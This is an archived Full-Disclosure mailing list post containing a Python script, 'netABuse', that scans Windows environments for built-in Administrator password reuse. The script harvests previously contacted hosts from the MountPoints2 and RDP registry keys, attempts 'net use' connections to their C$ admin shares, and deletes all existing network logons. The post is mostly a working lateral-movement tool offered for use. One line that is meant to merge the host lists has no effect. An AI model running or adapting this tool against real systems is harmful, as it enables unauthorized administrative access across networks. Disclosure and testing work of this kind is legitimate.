lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFD2FDMAuv2aVcg_JhaM5L--W8eczo-u50oDR9PZZgVvhf_tzg@mail.gmail.com>
Date: Wed, 8 Apr 2020 18:31:59 -0400
From: hyp3rlinx <apparitionsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] netABuse - Windows Insufficient Authentication Logic Scanner

import os,re,time,signal,sys
from subprocess import *
from multiprocessing import Process

#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#Advisory:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
#-----------------------------------
#When a remote systems built-in Administrator account is enabled and both
the remote and the target system
#passwords match (password reuse) theres no prompt for credentials and we
get logged in automagically.
#
#MountPoints2 and Terminal server client hints in the Windows registry can
help us.
#Typically, MountPoints2 is used by Forensic analysts to help determine
where an attacker laterally moved to previously.
#REG Query
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
/F "##" (we want network logons)
#MountPoints2 key entries are stored like '##10.2.1.40#c$'
#-----------------------------------------------------------

BANNER="""
               |       \     __ )
  __ \    _ \  __|    _ \    __ \   |   |   __|   _ \
  |   |   __/  |     ___ \   |   |  |   | \__ \   __/
 _|  _| \___| \__| _/    _\ ____/  \__,_| ____/ \___|
                                      By Hyp3rlinx

                                      ApparitionSec
"""

DRIVE="X"
FINDME="The command completed successfully."
REG_MOUNT2='REG Query
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
/F "##"'
REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal
Server Client\Servers\""+" /s"
VULN_FOUND=set()
DELAY=2   #Any lower and we may get inaccurate results.
rdp_server_lst=[]

#Return prior network logons to remote systems.
def mountpoints2():
    mntpoint2_connections=[]
    try:
        p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True)
        tmp = p.stdout.readlines()
    except Exception as e:
        print("[!] "+str(e))
        return False
    for x in tmp:
        idx = x.find("##")
        clean = x[idx:]
        idx2 = clean.rfind("#")
        ip = clean[2:idx2]
        ip = re.sub(r"#.*[A-Z,a-z]","",ip)
        if ip not in mntpoint2_connections:
            mntpoint2_connections.append(ip)
        mntpoint2_connections = list(filter(None, mntpoint2_connections))
    p.kill()
    return mntpoint2_connections


#Terminal server client stores remote server connections.
def rdp_svrs():
    global rdp_server_lst
    try:
        p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True)
        tmp = p.stdout.readlines()
        for key in tmp:
            if key.find("Servers")!=-1:
                pos = key.rfind("\\")
                srv = key[pos + 1:].replace("\r\n","").strip()
                rdp_server_lst.append(srv)
        p.kill()
    except Exception as e:
        print("[!] "+str(e))
        return False
    return True


#Disconnect
def del_vuln_connection(ip):
    try:
        print("[!] Disconnecting vuln network logon connection.\n")
        call(r"net use "+DRIVE+":"+" /del")
    except Exception as e:
        print("[!] "+str(e))


#Check connection
def chk_connection(ip):
    print("[+] Testing: "+ip)
    sys.stdout.flush()
    cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE,
shell=True)
    stderr, stdout = cmd.communicate()
    if "Reply from" in stderr and "Destination host unreachable" not in
stderr:
        print("[*] Target up!")
        return True
    else:
        print("[!] Target unreachable :(")
    return False


#Test vuln
def Test_Password_Reuse(ip):
    print("[+] Testing "+ip + " the builtin Administrator account.\n")
    sys.stdout.flush()
    try:
        p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator",
stdout=PIPE, stderr=PIPE, shell=True)
        err = p.stderr.readlines()

        if err:
            e = str(err)
            if e.find("error 53")!=-1:
                print("[*] Network path not found\n")
                return
            elif e.find("error 1219")!=-1:
                print("[*] Target connections to a server or shared
resource by the same user, using more than one user name are disallowed.\n")
                return
            elif e.find("error 85")!=-1:
                print("[*] The local device name is already in use.\n")
                return
            else:
                print(e+"\n")

        tmp = p.stdout.read()

        if FINDME in tmp:
            print("[*] Password reuse for the built-in Administrator
found!")
            print("[+] Connected to target: "+ ip)
            VULN_FOUND.add(ip+":Administrator")
            del_vuln_connection(ip)
        p.kill()
    except Exception as e:
        print("[!] "+str(e))



#Authenticate
def auth(ip):
    action_process = Process(target=Test_Password_Reuse, args=(ip,))
    action_process.start()
    action_process.join(timeout=5)
    action_process.terminate()


if __name__ == "__main__":

    print(BANNER)
    print("[+] M$ Windows net use Logon Command")
    print("[+] Insufficient Authentication Logic Scanner")
    print("[+] By hyp3rlinx\n")
    print("[!] Deletes existing network logons")
    print("[!] Scans environment for vuln machines.")
    print("[!] To continue hit enter or ctrl+c to abort.")
    raw_input("")

    print("[+] Deleting any existing network logons to start clean.")

    #Make sure no exist sessions already exist.
    call(r"net use * /del /y")
    sys.stdout.flush()
    time.sleep(1)


    #Grab previous connections from MountPoints2 if any.
    rdp_svrs()
    svrlst=mountpoints2()

    if svrlst:
        svrlst + rdp_server_lst
    else:
        svrlst = rdp_server_lst

    if not svrlst:
        print("[*] No MountPoints2 artifacts found, enter an IP.")
        sys.stdout.flush()
        ip=raw_input("[+] Target IP> ")
        if chk_connection(ip):
             auth(ip)
    else:
        #We have MountPoints2 or RDP Server list IP we can try.
        for ip in svrlst:
            if chk_connection(ip):
                 auth(ip)

            time.sleep(DELAY)


    if len(VULN_FOUND) != 0:
        print("[*] Located the following vulnerable systems:")
        sys.stdout.flush()
        for v in VULN_FOUND:
            print("[+] "+v)
    else:
        print("[+] All previous attempts failed, enter an IP and give it a
shot!.")
        sys.stdout.flush()
        ip=raw_input("[+] Target IP> ")
        if chk_connection(ip):
             auth(ip)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ